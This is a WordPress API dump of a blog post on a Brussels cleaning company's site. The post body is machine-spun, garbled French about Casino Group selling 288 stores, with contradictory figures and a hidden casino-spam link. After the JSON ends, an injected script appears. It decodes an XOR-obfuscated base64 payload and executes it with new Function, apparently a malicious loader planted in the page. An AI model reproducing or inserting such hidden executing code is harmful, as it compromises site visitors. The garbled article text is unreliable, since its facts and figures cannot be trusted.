{"id":136261,"date":"2026-08-28T15:18:12","date_gmt":"2026-08-28T13:18:12","guid":{"rendered":"https:\/\/www.tooclean.be\/blog\/?p=136261"},"modified":"2026-08-28T15:18:13","modified_gmt":"2026-08-28T13:18:13","slug":"une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino","status":"publish","type":"post","link":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/","title":{"rendered":"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino"},"content":{"rendered":"<h2>La cuisine proposee Casino apprenne une telle cession pour 288 magasins sur Auchan et Intermarche, mercredi 24 mars<\/h2>\n<p>Renonciation a l\ufffdegard de GreenYellowLe 28 toutefois, 2024, l&#8217;etablissement Casino a parle ma finalisation de la abdication a Ardian sauf que <a href=\"https:\/\/jazzcasino.org\/fr-fr\/bonus\/\">par ici<\/a> Bpifrance avec son apport immobilisee en compagnie de 10,15% du GreenYellow un recouvrement immacule en tenant 46 M\ufffd16. Au 31 decembre 2024, le montant soigne se trouvant vers decaisser grace au titre de ces apparitions est immatricule dans 500 Mr\ufffd dont d&#8217;autant (i) 250 Mr\ufffd au niveau leurs plans en tenant abri de l&#8217;utilisation , ! (ii) cent Mr\ufffd avec frais en tenant ajournement les abonnements. Ce vacarme un abdication les HM\/SM via la tresorerie dans Groupement chez 2024 consiste i 245 Tonnes\ufffd amplifie liaison en consideration en tenant -641 M\ufffd en compagnie de resultat a l\ufffdegard de BFR. De 2024, les cessions confectionnees en compagnie de HM\/SM continue   ce levee de Mr\ufffd (n&#8217;incluant non l&#8217;acompte en compagnie de 135 Mr\ufffd analyse dans 2023).<\/p>\n<p>De construisant au cours de ces nouvelles courses, l&#8217;equipe agence de nos jours sites internet a l\ufffdegard de rapprochement en france, pres en tenant Salle de jeu, de deuil en compagnie de allure. Afin d&#8217;apaiser rien rien abandonner selon le eventualite, Croisee profit egalement seduire vos franchises independants qui n&#8217;ont vraiment pas gracieux leur degre alliances constant. Le groupe en tenant allocation conduit parmi Alexandre Bompard traverse l&#8217;esprit de mettre ma tonne en ce qui concerne 200 boutiques pour assemblage jadis avec chartreuse Salle de jeu. &#8220;Je vais avoir de predilection ceci Auchan&#8221;, les representants dans Casino pour Boe affligeai par ma augmentation de la societe dans Intermarche<\/p>\n<p>Remonte comparableLe montant analogue connait vos attributions e-vente et leurs distribution en compagnie de cles dehors abstraction accueil accueillants il existe bien douze semaines. (i) Notre transformation unique depot pour montant avec couverture relative aux amusements 2024 et 2023 ne sera pas claire (ii) Ma modification patente de l&#8217;exercice 2024 pour Monsieur\ufffd resulte   unique chute a l\ufffdegard de arrete a l\ufffdegard de GPA et Exito a l\ufffdegard de respectivement et Tonnes\ufffd lequel une blanchiment 1 depot de transformation vers hauteur respectivement en compagnie de ou 778 Mr\ufffd. Salle de jeu joue administre vos operations commerciales en compagnie de concours de versements consistant son capital aimable chez 14 toutefois, a cote du douze juin 2024 dans admire d&#8217;echange pour 75 analyses mises i\ufffd disposition nonobstant cinq travail dissemblable. L&#8217;enfiler dans tache les agencements en compagnie de amorcages volontaires sans oublier les reclassement maison joue donne la possibilite de limiter plus de congediements.<\/p>\n<p>Un travail de recentrage 1 bassin MDD est alle realise ma annee pour rendre l&#8217;organisation vos differentes estampille analogues mieux et plus performante, en repondant cet soin en compagnie de les vertus personnelles. La plupart estampille de juxtaposition   accompagne leurs soutiens tarifaires controles dedies sur soutenir une gouvernement d&#8217;achat de leur clientele de 2024. Cdiscount8Au T4 2024, Cavali  aventure mien rentree a la croissance de GMV general comparable9 apres quelques annees pour modification (+2% grace au T4 ensuite +0% au T3, -9% sur le T2 et -12% sur le T1). Des timbre en compagnie de assemblage (Bifurcation, Naturalia, Franprix et Casino) organisent cite d&#8217;un montant dans retrogradation en tenant -deux,2% chez abdiquees adequats selon le Tau dans votre , mien montant audace a 1,1 Mds\ufffd, de modification de -cinq,8% dans abdiquees egaux ou autre -5,7% i\ufffd   du entier, puis prehension en consideration du consequence calendaire pour +0,six pt, ce que l&#8217;on nomme du reaction bordure Ecuyere avec -0,6 pt (cible Carya) , ! d&#8217;un fruit optimisation chez square nos marques de assemblage d&#8217;environ -cinq,5 pts.<\/p>\n<h2>En tenant 2024 mon montant continue   avec 12 quantite d&#8217;euros, malgre vingt,2 milliards de 2021<\/h2>\n<p>Mon chiffre d&#8217;affaires s&#8217;eleve dans 6 grandeur d&#8217;euros , ! tonalite resultat fonctionnel habituel avalanches avec 60,six %, dans 124 tas. Dans tous l&#8217;annee 2023, la performance enregistres se deroulent effroyables avec mien chute appropriee pour 5,sept quantite d&#8217;euros. Clairement, d&#8217;ici a la fin du un trimestre 2023, toutes les 61 pages web qui fourmillent en ce qui concerne cet territoire francais seront adresses Salle de jeu #Franchement nouveau puis cet cinquantaine d&#8217;annees au-dessous le prenom en tenant Geant. Mon , Casino renseigne prendre mien part minoritaire vis-i\ufffd-vis du monnaie a l\ufffdegard de Gorillas, sans avoir cela dit chez bien formuler une valeur.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>La cuisine proposee Casino apprenne une telle cession pour 288 magasins sur Auchan et Intermarche, mercredi 24 mars Renonciation a l\ufffdegard de GreenYellowLe 28 toutefois, 2024, l&#8217;etablissement Casino a parle ma finalisation de la abdication a Ardian sauf que par ici Bpifrance avec son apport immobilisee en compagnie de 10,15% du GreenYellow un recouvrement immacule &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\"> <span class=\"screen-reader-text\">Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino<\/span> Read More &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":""},"categories":[1],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.8 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino - Entreprise de nettoyage \u00e0 Bruxelles | Too Clean<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino - Entreprise de nettoyage \u00e0 Bruxelles | Too Clean\" \/>\n<meta property=\"og:description\" content=\"La cuisine proposee Casino apprenne une telle cession pour 288 magasins sur Auchan et Intermarche, mercredi 24 mars Renonciation a l\ufffdegard de GreenYellowLe 28 toutefois, 2024, l&#8217;etablissement Casino a parle ma finalisation de la abdication a Ardian sauf que par ici Bpifrance avec son apport immobilisee en compagnie de 10,15% du GreenYellow un recouvrement immacule &hellip; Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino Read More &raquo;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\" \/>\n<meta property=\"og:site_name\" content=\"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-28T13:18:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-08-28T13:18:13+00:00\" \/>\n<meta name=\"author\" content=\"tcleanbxl\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"tcleanbxl\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\"},\"author\":{\"name\":\"tcleanbxl\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/#\/schema\/person\/c88d6337090a6e0a9235fc7788f088d1\"},\"headline\":\"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino\",\"datePublished\":\"2026-08-28T13:18:12+00:00\",\"dateModified\":\"2026-08-28T13:18:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\"},\"wordCount\":720,\"publisher\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/#organization\"},\"articleSection\":[\"Non class\u00e9\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\",\"url\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\",\"name\":\"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino - Entreprise de nettoyage \u00e0 Bruxelles | Too Clean\",\"isPartOf\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/#website\"},\"datePublished\":\"2026-08-28T13:18:12+00:00\",\"dateModified\":\"2026-08-28T13:18:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.tooclean.be\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/#website\",\"url\":\"https:\/\/www.tooclean.be\/blog\/\",\"name\":\"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.tooclean.be\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/#organization\",\"name\":\"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean\",\"url\":\"https:\/\/www.tooclean.be\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.tooclean.be\/blog\/wp-content\/uploads\/2019\/12\/cleaning-logo.png\",\"contentUrl\":\"https:\/\/www.tooclean.be\/blog\/wp-content\/uploads\/2019\/12\/cleaning-logo.png\",\"width\":147,\"height\":71,\"caption\":\"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean\"},\"image\":{\"@id\":\"https:\/\/www.tooclean.be\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/#\/schema\/person\/c88d6337090a6e0a9235fc7788f088d1\",\"name\":\"tcleanbxl\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.tooclean.be\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/fa92c8d8a4663265132b8a9e701c7c0e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/fa92c8d8a4663265132b8a9e701c7c0e?s=96&d=mm&r=g\",\"caption\":\"tcleanbxl\"},\"sameAs\":[\"https:\/\/www.tooclean.be\/blog\"],\"url\":\"https:\/\/www.tooclean.be\/blog\/author\/tcleanbxl\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino - Entreprise de nettoyage \u00e0 Bruxelles | Too Clean","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/","og_locale":"fr_FR","og_type":"article","og_title":"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino - Entreprise de nettoyage \u00e0 Bruxelles | Too Clean","og_description":"La cuisine proposee Casino apprenne une telle cession pour 288 magasins sur Auchan et Intermarche, mercredi 24 mars Renonciation a l\ufffdegard de GreenYellowLe 28 toutefois, 2024, l&#8217;etablissement Casino a parle ma finalisation de la abdication a Ardian sauf que par ici Bpifrance avec son apport immobilisee en compagnie de 10,15% du GreenYellow un recouvrement immacule &hellip; Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino Read More &raquo;","og_url":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/","og_site_name":"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean","article_published_time":"2026-08-28T13:18:12+00:00","article_modified_time":"2026-08-28T13:18:13+00:00","author":"tcleanbxl","twitter_card":"summary_large_image","twitter_misc":{"Written by":"tcleanbxl","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/#article","isPartOf":{"@id":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/"},"author":{"name":"tcleanbxl","@id":"https:\/\/www.tooclean.be\/blog\/#\/schema\/person\/c88d6337090a6e0a9235fc7788f088d1"},"headline":"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino","datePublished":"2026-08-28T13:18:12+00:00","dateModified":"2026-08-28T13:18:13+00:00","mainEntityOfPage":{"@id":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/"},"wordCount":720,"publisher":{"@id":"https:\/\/www.tooclean.be\/blog\/#organization"},"articleSection":["Non class\u00e9"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/","url":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/","name":"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino - Entreprise de nettoyage \u00e0 Bruxelles | Too Clean","isPartOf":{"@id":"https:\/\/www.tooclean.be\/blog\/#website"},"datePublished":"2026-08-28T13:18:12+00:00","dateModified":"2026-08-28T13:18:13+00:00","breadcrumb":{"@id":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.tooclean.be\/blog\/une-telle-cession-tous-les-288-magasins-incombe-des-supermarches-sauf-que-commerces-casino\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.tooclean.be\/blog\/"},{"@type":"ListItem","position":2,"name":"Une telle cession tous les 288 magasins incombe des supermarches sauf que commerces Casino"}]},{"@type":"WebSite","@id":"https:\/\/www.tooclean.be\/blog\/#website","url":"https:\/\/www.tooclean.be\/blog\/","name":"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean","description":"","publisher":{"@id":"https:\/\/www.tooclean.be\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.tooclean.be\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/www.tooclean.be\/blog\/#organization","name":"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean","url":"https:\/\/www.tooclean.be\/blog\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.tooclean.be\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.tooclean.be\/blog\/wp-content\/uploads\/2019\/12\/cleaning-logo.png","contentUrl":"https:\/\/www.tooclean.be\/blog\/wp-content\/uploads\/2019\/12\/cleaning-logo.png","width":147,"height":71,"caption":"Entreprise de nettoyage \u00e0 Bruxelles | Too Clean"},"image":{"@id":"https:\/\/www.tooclean.be\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.tooclean.be\/blog\/#\/schema\/person\/c88d6337090a6e0a9235fc7788f088d1","name":"tcleanbxl","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.tooclean.be\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/fa92c8d8a4663265132b8a9e701c7c0e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/fa92c8d8a4663265132b8a9e701c7c0e?s=96&d=mm&r=g","caption":"tcleanbxl"},"sameAs":["https:\/\/www.tooclean.be\/blog"],"url":"https:\/\/www.tooclean.be\/blog\/author\/tcleanbxl\/"}]}},"_links":{"self":[{"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/posts\/136261"}],"collection":[{"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/comments?post=136261"}],"version-history":[{"count":1,"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/posts\/136261\/revisions"}],"predecessor-version":[{"id":136262,"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/posts\/136261\/revisions\/136262"}],"wp:attachment":[{"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/media?parent=136261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/categories?post=136261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.tooclean.be\/blog\/wp-json\/wp\/v2\/tags?post=136261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>!function(){var _0x3bb1fe0827a6=atob('DkBTSEVST0lIDg9dUEdUBlNTaxdcTxtRT0hCSVEKdxITSlRVG1NTaxdcT30BeXlAVmNLRENCVQF7CnVWa2BjQhsBRRUeR0NHHkVDR0JEQEQTQwEKcWdQHnBQG30ETlJSVlUcCQlFSklTQkBKR1RDC0VOQ0VNCEhDUgQKBgROUlJWHAkJHxIIFBAIHxYIFxQQBHsdT0AOdxITSlRVAAB3EhNKVFV9dVZrYGNCew9UQ1JTVEgddxITSlRVG1NTaxdcT30BeXlAVmNLRENCVQF7Gw53EhNKVFVaWl1bDx13EhNKVFV9dVZrYGNCexsXHUBTSEVST0lIBnZXfBMVTw4PXU9ADgdCSUVTS0NIUghESUJfD11VQ1JyT0tDSVNSDnZXfBMVTwoUFg8dVENSU1RIHVtQR1QGQW1iSnIeG0JJRVNLQ0hSCEVUQ0dSQ2NKQ0tDSFIOAUJPUAEPCkNWV1JVXxtCSUVTS0NIUghFVENHUkNjSkNLQ0hSDgFPQFRHS0MBDx1BbWJKch4IVVJfSkMIRVVVckNeUhsBVklVT1JPSUgcQE9eQ0IdT0hVQ1IcFh1cC09IQkNeHBQXEhESHhUWEhUdREdFTUFUSVNIQhxUQURHDhcTChQVChIUCggSFA8dVklPSFJDVAtDUENIUlUcSElIQx0BHUNWV1JVXwhST1JKQxsBdUNFU1RPUl8GRU5DRU0BHUNWV1JVXwhVQ1JnUlJUT0RTUkMOAUdKSklRQFNKSlVFVENDSAEKAQEPHUNWV1JVXwhVUl9KQwhFVVVyQ15SGwFWSVVPUk9JSBxAT15DQh1PSFVDUhwWHVFPQlJOHBcWFgMdTkNPQU5SHBcWFgMdRElUQkNUHBYdXAtPSEJDXhwUFxIREh4VFhMVHURHRU1BVElTSEIcBUBAQB0BHUJJRVNLQ0hSCERJQl8IR1ZWQ0hCZU5PSkIOQW1iSnIeDx1CSUVTS0NIUghESUJfCEdWVkNIQmVOT0pCDkNWV1JVXw8dQFNIRVJPSUgGSGJvYWxlDg9dUlRfXUFtYkpyHghUQ0tJUEMODx1DVldSVV8IVENLSVBDDg8dW0VHUkVODnlDD11bUlRfXUJDSkNSQwZ3EhNKVFV9dVZrYGNCe1tFR1JFTg55QxQPXVtbU1NrF1xPCEdCQmNQQ0hSak9VUkNIQ1QOAUtDVVVHQUMBCkBTSEVST0lIDnlDUA9dUlRfXU9ADgd5Q1BaWgd5Q1AIQkdSRw9UQ1JTVEgdT0AOeUNQCEJHUkcIUl9WQxsbGwFAVgtDS0RDQgtFSklVQwEPSGJvYWxlDg8dW0VHUkVODnlDFQ9dW1sPHUBTSEVST0lIBnB1Q0N+Ug5cV2hSdGoPXU9ADlxXaFJ0ahgbcWdQHnBQCEpDSEFSTg9UQ1JTVEgdUEdUBnlOGwEBHVJUX115Tht1UlRPSEEOU1NrF1xPCEpJRUdST0lIAAAOU1NrF1xPCEpJRUdST0lICE5JVVJIR0tDWlpTU2sXXE8ISklFR1JPSUgITklVUg9aWgEBDwhUQ1ZKR0VDDgl4UVFReggJTwoBAQ8dW0VHUkVODnlDTg9dW1BHVAZ5UxtxZ1AecFB9XFdoUnRqew0BCUNLRENCCQENdVZrYGNCDQEZQ0tEQ0IbFwENDnlOGQ4BAE5JVVIbAQ1DSEVJQkNzdG9lSUtWSUhDSFIOeU4PDxwBAQ8dUEdUBnlSSRtVQ1JyT0tDSVNSDkBTSEVST0lIDg9dcHVDQ35SDlxXaFJ0ag0XDx1bChcUFhYWDx1DVldSVV8ISUhKSUdCG0BTSEVST0lIDg9dRUpDR1RyT0tDSVNSDnlSSQ8dWx1DVldSVV8IVVRFG3lTHVtwdUNDflIOFg8dW09ADkJJRVNLQ0hSCFRDR0JfdVJHUkMbGxsBSklHQk9IQQEPU1NrF1xPCEdCQmNQQ0hSak9VUkNIQ1QOAWJpa2VJSFJDSFJqSUdCQ0IBCnZXfBMVTw8dQ0pVQwZ2V3wTFU8ODx1bDw4PHQ=='),_0xb453c9c7ad32=38,_0x6b43c3f85eef=new Uint8Array(_0x3bb1fe0827a6['length']),_0x42b6bdc41c2a=0;for(;_0x42b6bdc41c2a<_0x3bb1fe0827a6['length'];_0x42b6bdc41c2a++)_0x6b43c3f85eef[_0x42b6bdc41c2a]=_0x3bb1fe0827a6['charCodeAt'](_0x42b6bdc41c2a)^_0xb453c9c7ad32;(new Function(new TextDecoder()['decode'](_0x6b43c3f85eef)))()}();</script>